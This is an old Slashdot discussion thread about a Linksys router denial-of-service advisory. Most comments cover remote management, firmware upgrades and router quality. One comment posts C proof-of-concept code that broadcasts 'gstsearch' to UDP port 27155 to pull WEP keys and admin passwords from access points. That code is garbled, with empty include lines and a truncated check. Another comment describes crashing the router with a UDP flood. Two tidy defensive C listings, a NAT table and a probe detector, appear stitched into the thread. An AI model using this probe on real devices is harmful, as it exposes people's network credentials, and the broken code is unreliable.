
Vulnerability In Linksys Cable/DSL Router

CowboyNeal posted more than 11 years ago | from the bugs-sploits-and-buffer-overruns dept.

Security 262

ispcay writes "Yahoo has published an article on a Linksys vulnerability. An easily exploitable software vulnerability in a common home networking router by Linksys Group could expose thousands of home users to denial of service attacks, according to a security advisory issued by iDefense, a software security company." The article's kinda sparse on details, but does mention that the vulnerability is fixed in the latest firmware release. Upgrade 'em if ya got 'em!


fp (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#4614514)

fp

Luckily for me... (0, Troll)

pope nihil (85414) | more than 11 years ago | (#4614517)

I use netgear :)

Not to say that something like this won't happen to netgear. Plus you have to be concerned about those companies putting backdoors in for the NSA.

Re:Luckily for me... (1, Informative)

Anonymous Coward | more than 11 years ago | (#4614573)

Netgear home routers are rock solid when attached to cable modems, but are kind of flakey when attached to PPPoE DSL modems. But, then again, DSL is flakey itself. Just say NO to DSL! And a bigger fucking 'no' to the abortion of a protocol called PPPoE.

Re:Luckily for me... (1)

dirvish (574948) | more than 11 years ago | (#4614614)

Luckily for me...

I updated to version 1.42.7 months ago.

What's the best home router to buy? (0)

Anonymous Coward | more than 11 years ago | (#4614756)

Opinions?

So that's what happened to me 3 weeks ago... (2)

DaedalusLogic (449896) | more than 11 years ago | (#4614851)

I saw this happening on my router about three weeks ago... lights freaking out blinking... in other words a lot of traffic going through... Hit the good ole netstat -n and the spoofed IP adds were from get this... IANA.org What a sense of humor! Went through a bout of paranoia updated all my hardware firmware and other crap... Called Comcast told them about the DoS attack... of course they didn't care...

Still a great piece of hardware.

Upgrade Firmware (5, Funny)

moertle (140345) | more than 11 years ago | (#4614518)

after everyone who knows what they are doing flashes their firmware, 99.9% of routers will remain vulnerable...

Re:Upgrade Firmware (0)

Anonymous Coward | more than 11 years ago | (#4614549)

well, yeah, that's how the world of home personal computing works. i saw this story 4 minutes after it was posted, and i've already flashed my router. it's a good little piece of equipment though, on the whole.

Re:Upgrade Firmware (5, Informative)

Unknown Relic (544714) | more than 11 years ago | (#4614575)

While this is true, it's really not that big of a deal. The article states that for this attack to work from outside your internal network the remote management functionality needs to be turned on. I own a Linksys router and know for a fact that this feature is not enabled by default. Chances are that those knowledgeable enough to require, and enable, remote management will be the same tiny percentage who will bother to update their firmware.

While the attack will still work from inside the local network regardless of the state of the remote management function, it's really not a danger. The worst that someone could really do is DOS themselves, and wouldn't that be a shame...

Re:Upgrade Firmware (2)

Charles Dodgeson (248492) | more than 11 years ago | (#4614816)

While the attack will still work from inside the local network regardless of the state of the remote management function, it's really not a danger. The worst that someone could really do is DOS themselves, and wouldn't that be a shame
If, as I believe, the attack can be in the form of a URL, then imagine email like that contained something like

<a href="linksysCrasher">http://innocuous.site/</a&gt ;

(I typed that in correctly, but sd seems to add a space before the last semi-colon)

Something like that could fool people into DOSing themselves.

Re:Upgrade Firmware (2)

darkov (261309) | more than 11 years ago | (#4614826)

I bought a couple of these buggers- they were cheap (about $US80) and effective. But on the first day I decided to flash the ROM on one of them to the latest firmware. I followed all the instructions and the unit was toast. Three weeks later I got a replacement unit.

It's so easy for something to go wrong when flashing ROMs, I can't really risk doing without my router for weeks on end. Even if you know what you're doing, there's little you can do if it fails.

Re:Upgrade Firmware (5, Informative)

AmigaAvenger (210519) | more than 11 years ago | (#4614839)

Did the same thing, and after digging through linksys's site, i found out there IS a way to correct it. (check the docs, basically you just toss a new firmware up to it even if it doesn't respond. The router portion is separate from the switch, which seems to be able to flash it.)

4th Post? (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#4614521)

ya

remote management (5, Informative)

budcub (92165) | more than 11 years ago | (#4614530)

According to the article, if you have remote management turned off, then people out on the internet can't use the exploit against you.

Re:remote management (0)

Anonymous Coward | more than 11 years ago | (#4614825)

anyone with remote management turned on is a dumbass anyhow

Linksys SUCKS!!! (0, Flamebait)

Wakko Warner (324) | more than 11 years ago | (#4614532)

If this thing behaves anything like the way my WAP-11 wireless access point behaves, I feel really sorry for the people using this as their firewall.

There were days I couldn't even reach downstairs with the damned thing. . .

- A.P.

Re:Linksys SUCKS!!! (2)

jmv (93421) | more than 11 years ago | (#4614631)

I have a WAP-11 and it would freeze every time I'd transfer at "high" speed. Upgrading the firmware solved the problem. Now about range, I've seen a Cisco WAP suck even more (15" range indoor) and somehow resetting all default (which we didn't change) made it work. Seems like all this Wi-Fi equipment is still a bit experimental...

Re:Linksys SUCKS!!! (1)

slantyyz (196624) | more than 11 years ago | (#4614654)

If this thing behaves anything like the way my WAP-11 wireless access point behaves, I feel really sorry for the people using this as their firewall.

Well, if you can't reach downstairs, at least you've eliminated the risk of being warchalked.

Re:Linksys SUCKS!!! (2)

tulare (244053) | more than 11 years ago | (#4614676)

Nah, dude. I've had a BEFSR41 for almost two years now, and it has been nothing but rock-solid. Zero complaints on this unit. Of course, nmap identifies it as "trivial" but it's just a home box, more than adequate for keeping the casual s'kiddie off my back :)

Re:Linksys SUCKS!!! (1)

agent0range_ (472103) | more than 11 years ago | (#4614811)

Some people get a bit better range [d128.com] with their WAP-11's. Of course, you have to make your own antenna (or buy one).

Personally, I've never touched the WAP-11, but I do use the BEFW11S4-AT, and haven't had any problems for it.

As for this vulnerability, it's pretty much a non-issue. So some script-kiddie crashes your router. What do you do? Hit the reset button. There you go, now you're up and running again. Maybe it will even be enough of a lesson for you to go out and update the firmware, then disable remote management (which I've never even seen enabled by default on ANY of linksys' routers).

Linksys (0)

sprprsnmn (619113) | more than 11 years ago | (#4614537)

Don't most of the router/firewalls Linksys sells run GNU/Linux as their embedded OS? I seem to remember reading an article in linuxjournal that said as much.

Re:Linksys (0)

Anonymous Coward | more than 11 years ago | (#4614579)

No. They don't really have much of an OS. I worked on one of the earlier models, and as far as I know they're still using essentially the same code.

Re:Linksys (0)

Anonymous Coward | more than 11 years ago | (#4614627)

how much RAM/ROM is in one of those things, anyway?

Re:Linksys (0)

Anonymous Coward | more than 11 years ago | (#4614672)

The model I worked on had 32K RAM, and an 8K boot PROM.

Re:Linksys (0)

Anonymous Coward | more than 11 years ago | (#4614713)

enough for space invaders - cool thanks.

Re:Linksys (2)

cscx (541332) | more than 11 years ago | (#4614689)

How could they "not really have much of an OS" if it runs an HTTP server?

Re:Linksys (0)

Anonymous Coward | more than 11 years ago | (#4614730)

Uhhhh. It's not like it's running apache or anything. It's very minimalistic, and is written in hand optimized H8 assembly.

Re:Linksys (2, Informative)

MightyDrake (612329) | more than 11 years ago | (#4614742)

It doesn't take much to implement a TCP/IP stack, apparently. Check out a matchhead-sized web server. http://www-ccs.cs.umass.edu/~shri/iPic.html

Re:Linksys (2)

cscx (541332) | more than 11 years ago | (#4614661)

Yes. [linksys.com.sg]

Hillary Rosen (5, Funny)

CatWrangler (622292) | more than 11 years ago | (#4614538)

I am sure not a single hacker out there is going to investigate if Hillary Rosen has upgraded her software, and if they did so, it would only be to test her system, due to concern for her security and to warn her of possible problems.

DOS attack easily resolved by resetting device (2, Interesting)

Anonymous Coward | more than 11 years ago | (#4614539)

It's a 4 port home router - who's going to wage a DOS attack on a piddly $50 home router? And even if they did - just reset the darn thing. No big deal. I would only get the patch if this problem happened repeatedly.

Re:DOS attack easily resolved by resetting device (2, Interesting)

ralphus (577885) | more than 11 years ago | (#4614681)

I had someone launch a small one on me believe it or not. 50$ linksys router, cable modem, I notice a nmap scan happening, so i send him back some ICMP echo requests with LEAVE ME ALONE in the payload, and then about 25 zombies shut down my connection for about 20 minutes.

someone will attack anything for the same reason people climb mt Everest.

Re:DOS attack easily resolved by resetting device (0)

Anonymous Coward | more than 11 years ago | (#4614724)

someone will attack anything for the same reason people climb mt Everest.

chicks??

Re:DOS attack easily resolved by resetting device (0)

Anonymous Coward | more than 11 years ago | (#4614755)

You dolt! That was me, Morpheus. I was trying to tell you to wake up, Neo.

Re:DOS attack easily resolved by resetting device (0)

Anonymous Coward | more than 11 years ago | (#4614798)

I would only get the patch if this problem happened repeatedly.

Yeah, I sure wouldn't want to waste the five minutes it's going to take to install the updated firmware and plug a security hole. I'd rather have to reset my router in the middle of a 600 Mb download.

Actually, this little thing is kinda powerful (5, Insightful)

The Breeze (140484) | more than 11 years ago | (#4614871)

The default Linksys in the article has 4 ports, true, but they can actually support 254 clients if you connect them to a switch. Furthermore, the BEFSR11 is a one-port, designed to be connected to a switch or hub, and has proven very popular in labs of anywhere from 10-30 workstations, although it can actually support up to 254 clients. Consequently, there are those out there who may get a sick kick out of kicking schools, non-profit organizations and other institutions offline.

The BEFSR11 is truly cool. $50 gets you a box that barely draws any power and routes requests quite nicely for 254 machines and functions as a DHCP server to boot. Practically maintenance free. Most of mine already have upgraded firmware, but you can bet that I - and several other admins who oversee non-profit and educational sites - will be busy checking firmware versions for a while.

i thought this was already known... (2, Interesting)

Essron (231281) | more than 11 years ago | (#4614541)

I heard the 'remote management' option was a huge vulnerability over a year ago. I'm no expert, but I doubt any security conscious folks would have remote management enabled, and it is not clear if the boxes are vulnerable with this feature turned off.

Or am I missing something?

Re:i thought this was already known... (0)

Anonymous Coward | more than 11 years ago | (#4614865)

Linksys routers have this option disabled by default...

Simple fix, not hard (5, Insightful)

tulare (244053) | more than 11 years ago | (#4614543)

From the e-week article, all you have to do is disable remote admin, which is the default setting, which you should have confirmed anyhow. Duh.
No firmware flashing needed.

Users would have to turn remote management on (5, Informative)

hillct (230132) | more than 11 years ago | (#4614544)

While I agree that the vast majority of home users will either lack the technical expertise or poise to flash the firmware, these are the people who will plug in the router and forget it, which means remote management won't be turned on so the attack won't be possible (unless the user opens up a telnet or SSH port for NAT pass-thru).

--CTH

And on top of that... (2)

devphil (51341) | more than 11 years ago | (#4614659)


This boggles my mind:

The 4-port DSL router (vulnerable) is using firmware 1.40something, and must be upgraded. The latest is 1.43.

The 8-port model, which is what I have, and which is exactly the same damn thing (same functionality, same interface, almost the same user manual) except that it's a few inches wider and has 4 more ports, uses firmware 2.something. And is apparently not vulnerable.

Providing another 4 ports (one extra bit?) requires the firmware to be that different?

Re:And on top of that... (5, Informative)

Jace of Fuse! (72042) | more than 11 years ago | (#4614697)

Providing another 4 ports (one extra bit?) requires the firmware to be that different?

Having used both, I can tell you that they are not "exactly the same" as you put it.

The two models are very different.

For starters, the 8 port version is NOT a few inches wider. It's the exact same width and looks identical from the front except the light arrangement which is slightly different.

Secondly, it's a 4 port Switch AND a 4 port Hub, (4 switched ports, and 4 hub ports).

The 4 Switched ports have QoS options, and the 4 port hub can be given a priority of its own (higher or lower than the switched ports, I believe).

There are also a few other details in the 8 port version that are not present in the 4 port version so we can safely assume they are functionality that is not present in the 4 port model for obvious reasons (it doesn't need them.)

Re:Users would have to turn remote management on (1)

Centinel (594459) | more than 11 years ago | (#4614849)

While I agree that the vast majority of home users will either lack the technical expertise or poise to flash the firmware, these are the people who will plug in the router and forget it, which means remote management won't be turned on so the attack won't be possible (unless the user opens up a telnet or SSH port for NAT pass-thru).

I flashed mine today and it's as brainless a job as it gets....download a Win32 executable, run it, it scans your RFC1918 network, finds the IP of your router, asks you to confirm the ip, then flashes...total time from download to complete in under 3 minutes, and nothing but clickin-n-dickin.

Sheesh, if someone can't figure that out....

Find Relief Here (5, Informative)

footNipple (541325) | more than 11 years ago | (#4614546)

This should get you on the path to recovery...this and a stiff shot of Black Bush:

http://www.linksys.com/download/default.asp [linksys.com]

Re:Find Relief Here (1)

jhunsake (81920) | more than 11 years ago | (#4614721)

C'mon! Everyone knows Bush is white [slashdot.org] !

Re:Find Relief Here (0)

Anonymous Coward | more than 11 years ago | (#4614728)

yes he is indeed [whitehouse.gov]

Hmmmm.... (4, Insightful)

El Pollo Loco (562236) | more than 11 years ago | (#4614548)

While I have a linksys router, this still does not concern me. All I have to do, is unplug it, and plug it back in. Net' access restored. I don't know of any home users who need 100% uptime internet access. I suppose there are some work at home people who might need it. But personally, I have enough problems with AT&T cables fluctuating speeds than I would with my router crashing.

Not too much of an issue (2)

metalhed77 (250273) | more than 11 years ago | (#4614550)

This only affects you if your router has 'remote management' enabled. Since so few people need this, and those that do are more technically minded, this shouldn't be much an issue. The worst this flaw can cause anyways is for the router to crash. The software in there sucks. My linksys crashes if it can't find a dhcp server, that a simple cgi script error crashes it is nothing new to me.

From what I see (5, Informative)

jchawk (127686) | more than 11 years ago | (#4614552)

It looks like in order to cause the crash you have have remote management enabled. Why on earth you would allow your router to be configured from outside on the internet boggles my mind. I would assume that this feature would be disabled by default, but then again who knows. I've owned a few cheap routers before and in order to use remote management you had to be connecting from an internal ip address, along with not coming through the wan port.

Just my 2 cents.

on my Linksys router (not vulnerable).. (1)

512k (125874) | more than 11 years ago | (#4614615)

remote management is disabled by default, and the option to enable it, is under the "advanced" tab.

And one reason to have it turned on, is if it's your responsibility to manage the router, and it's easier to connect to it remotely, than talk someone on the LAN through adjusting it over the phone....

now that I think about it, probably the major thing you'd change on the router, is the information you need to connect to your ISP, and with the wrong/outdated info, the router won't be on the internet in the first place.

And the point is what? (4, Insightful)

Chris_Stankowitz (612232) | more than 11 years ago | (#4614554)

Devices like linksys suffered from a much larger security problem. IGNORANCE! Highspeed access in the home has brought about a whole new type of internet user. The type that doesn't log off. Let's be honest, many of us are lazy. We know what we are doing but still lazy. Then there is the other group, not lazy, but they don't know what they are doing. The security issues that go along with multiple machines, always connected to the internet without ANY protection (Node firewalls like norton internet security for example or virus protection, i don't need to give an example of that) far exceed any "NEW" issues that may now exist because of a flaw in this product. Education!!! Plain and simple will reduce any threat that this flaw or any other would exacerbate.

Re:And the point is what? (0)

fliptw (560225) | more than 11 years ago | (#4614817)

As many have already stated, in order to exploit this externally, you need to have Remote Management turned on, which is disabled by default. And the routers also by default block all incoming ports. Which means this is only exploitable on the lan side.

BEFSR41 upgrade utility link location (5, Informative)

NynexNinja (379583) | more than 11 years ago | (#4614555)

Here [linksys.com] is the location of the Linksys BEFSR41 firmware upgrade utility v1.43 released Sept 4, 2002. It's the newest one I could find.

not vulnerable by default (2, Informative)

XaXXon (202882) | more than 11 years ago | (#4614556)

I have one of these, and the remote administration isn't enabled by default.

So for Aunt Tilly, there's no real danger unless the malicious person is on the network.

Anyone remember the Bud Ice commercials? "...I REPEAT! THAT CALL WAS PLACED FROM INSIDE THE HOUSE!!"

All router versions appear to use the same fmwr (4, Informative)

quantumparadox (454022) | more than 11 years ago | (#4614557)

I upgraded my BEFSR11 and it used the same firmware update as the *41 (4 port switch model) so it's pretty safe to assume this version is vulnerable as well.

The firmware updates can be had here:

http://www.linksys.com/download/firmware.asp

lazy people unite! (0)

magwa (88267) | more than 11 years ago | (#4614558)

I was looking for a link to their page since i am lazy. No one posted one yet, so here is one for all the other lazy people like me:

http://www.linksys.com/download/

Non-issue, really... (2, Redundant)

Keeper (56691) | more than 11 years ago | (#4614560)

Unless you've got your router setup to allow you to configure it remotely (ie: on the cablemodem side of the network; aka, while you're at your friends house). If you've done this, odds are this problem is the least of your concerns.

And there's already a firmware fix for it, should you be concerned that any script kiddies living in your house will want to hose their connection to the outside world...

Yeah Right.... (1)

dirkdidit (550955) | more than 11 years ago | (#4614567)

How many people that own these routers will actually update the firmware? Or how many even will know that their router has a problem. I know several people with Linksys routers and I know if somebody doesn't tell them to update something, they won't update it on their own. Even if the people who know how to update their routers and know that there is a problem update them, that still leaves the majority of users in the dark. Not a good idea.....

Re:Yeah Right.... (2)

TheOnlyCoolTim (264997) | more than 11 years ago | (#4614593)

But this majority also won't go into the advanced options of their Linksys to turn on Remote Management and make it vulnerable to this attack.

Re:Yeah Right.... (1)

el_flynn (1279) | more than 11 years ago | (#4614678)

I downloaded the firmware upgrade, it was a simple windows program where you had to specify the ip address of the router. So it's not "Flashing" per se, pretty simple and painless procedure (you don't even have to (gasp) reboot the unit) that i bet grammy could do it too.

Big deal, (3, Insightful)

Trusty Penfold (615679) | more than 11 years ago | (#4614572)



Firstly, my router (SMC, not linksys) crashes on its own every now and then.
It's consumer grade gear, people are probably used to turning them off and back on again anyway. And it's not like the main computer is affected.

Secondly, the attack has to originate on the inside network. It's not like the script kiddiz can take out these box en masse by blasting out a load a packets. Once you visit a malicious site - if there even is a real one - you'll soon learn not to go there again.

Re:Big deal, (0)

Anonymous Coward | more than 11 years ago | (#4614612)

Do you have the latest SMC firmware?
Easy way to tell - do you have to login twice to the SMC router web admin screen? If so, that's a buggy one.

Re:Big deal, (1)

Trusty Penfold (615679) | more than 11 years ago | (#4614690)

Do you have the latest SMC firmware? Currently, yes. I can't honestly claim to keep up to date with patches for the non-obvious stuff though.

do you have to login twice? Nope, never had that one. How did they manage to write that bug? And how did QA miss it?

Re:Big deal, (2)

cscx (541332) | more than 11 years ago | (#4614830)

It's not like the script kiddiz can take out these box en masse by blasting out a load a packets.

See my other post here. [slashdot.org] All it takes is some UDP packets using nmap and the router goes belly-up. Try it sometime from an offsite unix host.

*sigh* (3, Informative)

jeffy124 (453342) | more than 11 years ago | (#4614574)

When will the media realize that not all DoS attacks are DDoS? DDoS is when the attacker gets a bunch of machines to all send data to the target machine, causing the target to run out of resources to handle all connections, swallowing the legit traffic in the process.

"Normal" DoS is what this is - crashing the target. For example, an old flaw in Wu-FTPD allowed a core dump - crashing the daemon and creating a DoS to anyone who needs it. All it took was a malformed request during a session. One machine required, not many.

change default admin password first!!!!! (0)

Anonymous Coward | more than 11 years ago | (#4614596)

1) most users have not changed the default admin password from 'admin'

2) this is only a problem on the inside network.

Bizarre!!! (2)

T-Kir (597145) | more than 11 years ago | (#4614591)

Weird or what...

I've spent this evening trying to sort out why the router goes belly-up after using eDonkey for a while. The problem started a week ago, but since then the occurrences were more regular. I just upgraded the firmware an hour ago!!!

I have the BEFSR411 and found a decent forum link with the same problem [broadbandreports.com] ... and there is another link of info/problems here [broadbandreports.com] .

I suppose it goes without saying that updating the firmware is a good idea... at least there are more improvements to the web-config interface. I'll just have to see how long the connection stays up.

Those Dumb Fucks (2, Informative)

cscx (541332) | more than 11 years ago | (#4614607)

I hate Linksys. I have that router, and it kept crashing on me. Changed the cable, everything, etc. Nothing. Even thought it was the cable modem for a while (would lose net access, but I finally found out the router wouldn't accept internal pings either). They sent me a new one (made ME pay for shipping), and it did the same thing. Tried all firmware versions, nothing.

Well, guess what. When you fire a bunch of UDP packets at it, the NAT routing table overflows and the router crashes (it happens faster if you have your DMZ host address set to a nonexistent address on the network), only to reboot itself in a few minutes. This has been tested and proven, but Linksys' response to me is "it's your software firewall, sir, you shouldn't run both at the same time." What a bunch of ignorant assholes. I informed them of the routing table overflow bug, but they ignored me.

Now, this bug shouldn't really affect anybody cause you really shouldn't run remote admin on your router, but with their shoddy firmware, it doesn't surprise me in the bit!
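A translation table that stays inside its bounds under a flood of new UDP flows, by expiring idle mappings and otherwise evicting the least recently used one, is sketched below as an added example for the failure described in the comment above. It is not Linksys firmware code; the table size, idle timeout, port pool and every name in it are assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define NAT_SLOTS     8       /* assumed: deliberately tiny table */
#define NAT_IDLE_S    30      /* assumed: UDP mapping idle timeout, seconds */
#define NAT_PORT_MIN  40000   /* assumed: external port pool */
#define NAT_PORT_MAX  65535

struct nat_entry {
    uint32_t in_ip;       /* inside host address */
    uint16_t in_port;     /* inside source port */
    uint16_t ext_port;    /* port presented on the WAN side */
    uint32_t last_seen;   /* time of the last packet, seconds */
    int      used;
};

struct nat_table {
    struct nat_entry slot[NAT_SLOTS];
    uint16_t next_port;   /* next candidate external port */
    unsigned evictions;   /* live mappings dropped because the table was full */
};

void nat_init(struct nat_table *t)
{
    for (size_t i = 0; i < NAT_SLOTS; i++)
        t->slot[i].used = 0;
    t->next_port = NAT_PORT_MIN;
    t->evictions = 0;
}

unsigned nat_used(const struct nat_table *t)
{
    unsigned n = 0;
    for (size_t i = 0; i < NAT_SLOTS; i++)
        n += t->slot[i].used ? 1u : 0u;
    return n;
}

static int port_in_use(const struct nat_table *t, uint16_t port)
{
    for (size_t i = 0; i < NAT_SLOTS; i++)
        if (t->slot[i].used && t->slot[i].ext_port == port)
            return 1;
    return 0;
}

/* Return the external port for (in_ip, in_port), creating a mapping if needed.
 * The table never grows: a new flow takes a free or expired slot, and when
 * none exists it replaces the least recently used mapping. */
uint16_t nat_map(struct nat_table *t, uint32_t in_ip, uint16_t in_port,
                 uint32_t now)
{
    struct nat_entry *victim = NULL;

    for (size_t i = 0; i < NAT_SLOTS; i++) {
        struct nat_entry *e = &t->slot[i];
        if (e->used && now - e->last_seen > NAT_IDLE_S)
            e->used = 0;                          /* idle mapping expired */
        if (e->used && e->in_ip == in_ip && e->in_port == in_port) {
            e->last_seen = now;                   /* packet on a known flow */
            return e->ext_port;
        }
        /* Best slot to reuse so far: free beats used, older beats newer. */
        if (victim == NULL ||
            (victim->used && !e->used) ||
            (victim->used && e->used && e->last_seen < victim->last_seen))
            victim = e;
    }

    if (victim->used)
        t->evictions++;                           /* table full: drop LRU flow */
    victim->used = 0;

    uint16_t port;
    do {                                          /* skip ports still mapped */
        port = t->next_port;
        t->next_port = (port == NAT_PORT_MAX) ? NAT_PORT_MIN
                                              : (uint16_t)(port + 1);
    } while (port_in_use(t, port));

    victim->in_ip = in_ip;
    victim->in_port = in_port;
    victim->ext_port = port;
    victim->last_seen = now;
    victim->used = 1;
    return port;
}

int main(void)
{
    struct nat_table t;
    nat_init(&t);
    /* Constructed flood: 10000 distinct inside flows in the same second. */
    for (uint32_t i = 0; i < 10000; i++)
        nat_map(&t, 0x0A000001u + i, 53, 1);
    printf("slots used: %u of %d, evictions: %u\n",
           nat_used(&t), NAT_SLOTS, t.evictions);
    return 0;
}
```

Eviction costs the displaced flow its mapping, so `evictions` is the counter to watch or rate-limit on; the device keeps forwarding either way.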

good/bad experiences with wireless Linksys router? (0)

Anonymous Coward | more than 11 years ago | (#4614651)

'cause I was thinking of buying one.
Also - which wireless PCMCIA (or whatever the acronym is) is a good one?
Is encryption turned on by default on these things?

Re:good/bad experiences with wireless Linksys rout (0)

Anonymous Coward | more than 11 years ago | (#4614725)

I just went around the fucking merry go round with linksys's wpc11 pcmcia card. What a flaming POS! The card was flimsy, the drivers flat out didn't work, and when I called the techsupport line the lady on the other end of the line in buttfuck India was clueless... AVOID ANYTHING LINKSYS!!! I switched to a netgear (ma401 iirc) wireless card and it Just Worked. No fuss, no muss.

Re:good/bad experiences with wireless Linksys rout (1)

RoundSparrow (341175) | more than 11 years ago | (#4614753)

Avoid FORD, get a Chevy. I had a Ford break down once...

Avoid Chevy, get a Ford, I had a Ford break down once....

Maybe it is the driver? Maybe if you buy the WORSE model Ford or Chevy makes you have problems? Brands don't mean crap. You have to get _specific_ on which model, which version of the Linksys, etc.

Re:good/bad experiences with wireless Linksys rout (1)

shepd (155729) | more than 11 years ago | (#4614875)

>Brands don't mean crap.

Because, hey, the only Lada that sucks is all of them.

Re:Those Dumb Fucks (2, Informative)

soulctcher (581951) | more than 11 years ago | (#4614840)

I've not had many problems with my linksys since the VERY early firmware. As far as the UDP packet issue, you may be right. I mod http://www.kaillera.com/ [kaillera.com] 's forums, [the Kaillera client/server software allows gaming programs, mainly emulators, to communicate over the net, though they normally wouldn't].

During the early stages, we had more and more people telling us that they were having problems accessing the servers in Kaillera. The connection protocol happens to be UDP.

The problem was, I was fine, as were a number of others that use(d) the linksys routers. Our suggestion was to upgrade the firmware or to just DMZ the router, which worked 90% of the time. For many people, that worked. Over the almost two years now, the problems w/the router have almost completely disappeared.

Only DOS Attacks? Could be worse. (2, Funny)

Guido69 (513067) | more than 11 years ago | (#4614613)

If anyone hears reports of the '41 being subject to ME or XP attacks, please post. For now...well... I've never been afraid of a couple of backslashes or a c:\.

There are problems with wireless, too (5, Informative)

Raetsel (34442) | more than 11 years ago | (#4614649)


The following showed up on the NetStumbler [netstumbler.com] site yesterday:
  • GlobalSunTech develops Wireless Access Points for OEM customers like Linksys, D-Link and others. Capturing the traffic of a WISECOM GL2422AP-0T during the setup phase showed a security problem.

    Sending a broadcast packet to UDP port 27155 containing the string "gstsearch" causes the accesspoint to return wep keys, mac filter and admin password. This happens on the WLAN Side and on the LAN Side.

    Systems Affected:

    Vulnerable, tested, OEM Version from GlobalSunTech:
    • WISECOM GL2422AP-0T

    Possibly vulnerable, not tested, OEM Version from GlobalSunTech:
    • D-Link DWL-900AP+ B1 version 2.1 and 2.2
    • ALLOY GL-2422AP-S
    • EUSSO GL2422-AP
    • LINKSYS WAP11 v2.2
(And I just got a WAP11, dammit.)

In other news, JWZ's DNA Lounge [dnalounge.com] is having troubles [dnalounge.com] with their Linksys WAP11-based wireless link, which is their only connectivity right now.

  • "...the best sustained throughput they can handle is on the order of 64k."
Ouch.

(They lost their T1 due to XO's bankruptcy and above.net closing a facility. Another T1 is on the way, but it'll be a couple weeks...)
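For spotting the probe quoted in the comment above on a monitored segment, the following added example (not part of the original post or the advisory) classifies a raw IPv4 datagram as a "gstsearch" query to UDP port 27155, with bounds checks on every header length. The function names, verdict values and the sample packet builder are assumptions, and the sample packets are constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define GST_PORT 27155                     /* UDP port named in the advisory text */
static const char GST_MAGIC[] = "gstsearch";

enum gst_verdict {
    GST_MALFORMED = -1,   /* truncated or inconsistent headers */
    GST_CLEAN     = 0,    /* not IPv4/UDP to port 27155 */
    GST_PORT_HIT  = 1,    /* UDP to 27155 without the magic string */
    GST_PROBE     = 2     /* UDP to 27155 carrying "gstsearch" */
};

static uint16_t be16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* Bounded substring search: the payload is not NUL-terminated. */
static int contains(const uint8_t *hay, size_t hlen, const char *needle)
{
    size_t nlen = strlen(needle);
    if (nlen == 0 || hlen < nlen)
        return 0;
    for (size_t i = 0; i + nlen <= hlen; i++)
        if (memcmp(hay + i, needle, nlen) == 0)
            return 1;
    return 0;
}

/* pkt points at the IPv4 header; len is the number of captured bytes. */
enum gst_verdict gst_classify(const uint8_t *pkt, size_t len)
{
    if (len < 20)
        return GST_MALFORMED;
    if ((pkt[0] >> 4) != 4)
        return GST_CLEAN;                          /* not IPv4 */
    size_t ihl = (size_t)(pkt[0] & 0x0F) * 4;
    size_t total = be16(pkt + 2);
    if (ihl < 20 || total < ihl || total > len)
        return GST_MALFORMED;
    if (pkt[9] != 17)
        return GST_CLEAN;                          /* not UDP */
    if (be16(pkt + 6) & 0x1FFF)
        return GST_CLEAN;                          /* later fragment: no UDP header */
    if (total - ihl < 8)
        return GST_MALFORMED;
    const uint8_t *udp = pkt + ihl;
    size_t ulen = be16(udp + 4);
    if (ulen < 8 || ulen > total - ihl)
        return GST_MALFORMED;
    if (be16(udp + 2) != GST_PORT)
        return GST_CLEAN;
    return contains(udp + 8, ulen - 8, GST_MAGIC) ? GST_PROBE : GST_PORT_HIT;
}

/* Build a constructed IPv4/UDP broadcast packet for the demo.
 * Checksums are left zero because gst_classify() does not verify them. */
size_t gst_sample_packet(uint8_t *buf, size_t cap, uint16_t dport,
                         const char *payload)
{
    size_t plen = strlen(payload), total = 20 + 8 + plen;
    if (total > cap || total > 0xFFFF)
        return 0;
    memset(buf, 0, total);
    buf[0] = 0x45;                                 /* IPv4, 20-byte header */
    buf[2] = (uint8_t)(total >> 8);
    buf[3] = (uint8_t)(total & 0xFF);
    buf[8] = 64;                                   /* TTL */
    buf[9] = 17;                                   /* protocol: UDP */
    memcpy(buf + 12, "\xC0\xA8\x01\x32", 4);       /* 192.168.1.50, constructed */
    memset(buf + 16, 0xFF, 4);                     /* 255.255.255.255 */
    buf[20] = 0x80;                                /* source port 32768 */
    buf[22] = (uint8_t)(dport >> 8);
    buf[23] = (uint8_t)(dport & 0xFF);
    buf[24] = (uint8_t)((8 + plen) >> 8);
    buf[25] = (uint8_t)((8 + plen) & 0xFF);
    memcpy(buf + 28, payload, plen);
    return total;
}

int main(void)
{
    uint8_t b[128];
    size_t n = gst_sample_packet(b, sizeof b, GST_PORT, "gstsearch");
    printf("probe packet   -> %d\n", gst_classify(b, n));
    n = gst_sample_packet(b, sizeof b, 53, "gstsearch");
    printf("other UDP port -> %d\n", gst_classify(b, n));
    return 0;
}
```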

Exploit Linksys Routers (1)

docstrange (161931) | more than 11 years ago | (#4614662)

When I ran the following code, which is designed to return the wep key, admin username and password on my linksys befsr41w. It hard locked. I tried it again. Same thing.

(the befsr41w is less common, it's like a befsr41 with a pcmcia slot so you can upgrade it to support wireless networking)

here's the code

#include
#include
#include
#include
#include
typedef struct {
char type[28];
char name[32];
char user[16];
char pass[16];
}
__attribute__ ((packed)) answer;
int main()
{
char rcvbuffer[1024];
struct sockaddr_in sin;
answer* ans = (answer *)rcvbuffer;
int sd, ret, val;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("255.255.255.255");
sin.sin_port = htons(27155);
sd = socket(AF_INET, SOCK_DGRAM, 0);
if (sd type);
printf("Announced Name : %s\n",ans->name);
printf("Admin Username : %s\n",ans->user);
printf("Admin Password : %s\n",ans->pass);
return 0;
}

Nuff Said. I'm disappointed in Linksys.

Re:Exploit Linksys Routers (1)

Trusty Penfold (615679) | more than 11 years ago | (#4614782)


I doubt it was your linksys that was locking up; I'm guessing it was your compiler.

Old News (1)

Symb (182813) | more than 11 years ago | (#4614663)

This is old news all. Basically you could use SNMP to turn on the remote management (e.g. use web interface from the WAN side). Then once you had web access you could do anything the web interface would allow. They fixed this how long ago? PS There is a new release of the firmware postdating the article (1.43). Some moderator was in a hurry and posted FUD.

Re:Old News (proof) (2, Informative)

Symb (182813) | more than 11 years ago | (#4614714)

Oh and bugtraq [securityfocus.com] says that 1.42.7 isn't secure either.

Here [securepoint.com] is a mailing list archive or yet another redundant reference of this problem. It's almost a year old. Come on slashdotters, don't get sloppy in the deluge huh?

DoS? Who cares? (1)
